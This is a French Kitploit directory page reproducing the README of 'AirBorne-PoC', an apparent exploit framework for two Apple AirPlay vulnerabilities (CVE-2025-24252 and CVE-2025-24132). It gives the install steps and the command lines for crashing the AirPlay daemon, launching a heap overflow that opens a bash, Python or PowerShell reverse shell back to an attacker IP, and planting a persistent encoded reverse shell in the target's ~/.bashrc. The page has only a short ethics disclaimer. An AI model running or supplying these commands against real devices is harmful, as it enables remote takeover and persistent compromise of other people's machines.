Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
AirBorne-PoC — poc for CVE-2025-24252 & CVE-2025-24132 | Kitploit
Outils/GitHubGitHub/ekomssavior/airborne-poc
Persistence MechanismsVulnerability AnalysisExploitationShellcodePost-ExploitationCommand and ControlRemote Access ToolPayload DevelopmentBinary Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc for CVE-2025-24252 & CVE-2025-24132

16427il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

AirBorne PoC Framework – Édition Elite RCE

Framework PoC complet pour CVE-2025-24252 & CVE-2025-24132
Par ekomsSavior |

AirBorne est un framework de preuve de concept (PoC) combiné ciblant deux vulnérabilités graves dans le service AirPlay d'Apple. Il comprend un déclencheur de crash complet et un exploit de shell inversé fonctionnel avec persistance optionnelle, écouteur et plusieurs formats de payload — le tout dans un seul script.

Vous cherchez la version originale ?
L'édition héritée est toujours disponible dans la branche legacy de ce dépôt.
Pour la consulter :

root@kitploit:~
git checkout legacy

CVEs couvertes

CVE-2025-24252 – mDNS TXT Record Crash

  • Déclenche un crash dans le démon AirPlayReceiver via un paquet mDNS malformé
  • Fonctionne via diffusion UDP sur le port 5353

CVE-2025-24132 – Heap Overflow → Shell inversé (RCE)

  • Déclenche un heap overflow dans le service TCP d'AirPlay sur le port 7000
  • Prend en charge les payloads de shell inversé bash, python et PowerShell
  • Inclut une persistance optionnelle via injection dans .bashrc (Linux)

Pour commencer

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Installer les dépendances

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Guide d'exécution

Le script unique airborne.py inclut les deux PoCs et toute la logique :

  • Sélectionnez une CVE avec --exploit
  • Définissez un payload de shell inversé avec --payload
  • Démarre automatiquement un écouteur netcat pour vous
  • Active optionnellement la persistance sur la cible avec --persistent

Exemples d'utilisation

Cibler un crash avec un paquet mDNS (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Nécessite une interface en mode moniteur.


Lancer Heap Overflow → RCE (CVE-2025-24132)

Lancer l'exploit complet avec le shell bash par défaut :

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Choisir plutôt le shell Python :

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Activer la persistance réelle sur les cibles Linux :

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Injection de commande shell uniquement

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Options de payload

PayloadDescription
bashShell inversé bash par défaut sur TCP
pythonShell inversé basé sur Python utilisant socket et pty

Mode persistance

Lors de l'utilisation de --persistent, le script ajoutera le payload de shell inversé encodé au fichier suivant de la cible :

root@kitploit:~
~/.bashrc

Cela garantit qu'un shell vous est retourné à chaque connexion de l'utilisateur ou ouverture d'un terminal.


Notes de maintenance

  • Les shells inversés sont encodés avec base64 et délivrés après le débordement de tampon
  • Tous les payloads sont envoyés via le port 7000
  • Les paquets mDNS transitent par UDP 5353 et nécessitent une autorisation de socket brute
  • Assurez-vous que l'IP de votre machine d'attaque est accessible par l'appareil cible
  • Le script gère les cas d'erreur basiques et échoue silencieusement si les ports sont fermés

Avertissement éthique

Ce projet est destiné uniquement à la recherche éducative, éthique et autorisée.

  • Vous devez avoir une autorisation explicite pour tester le système cible.
  • Vous assumez l'entière responsabilité de toute action entreprise.

L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique.


Crédits

  • Construit par ekomsSavior
  • Inspiré par des CVE réelles et la recherche en développement d'exploits
Télécharger l’outil
powershell
Payload RCE Windows PowerShell complet (obfusqué)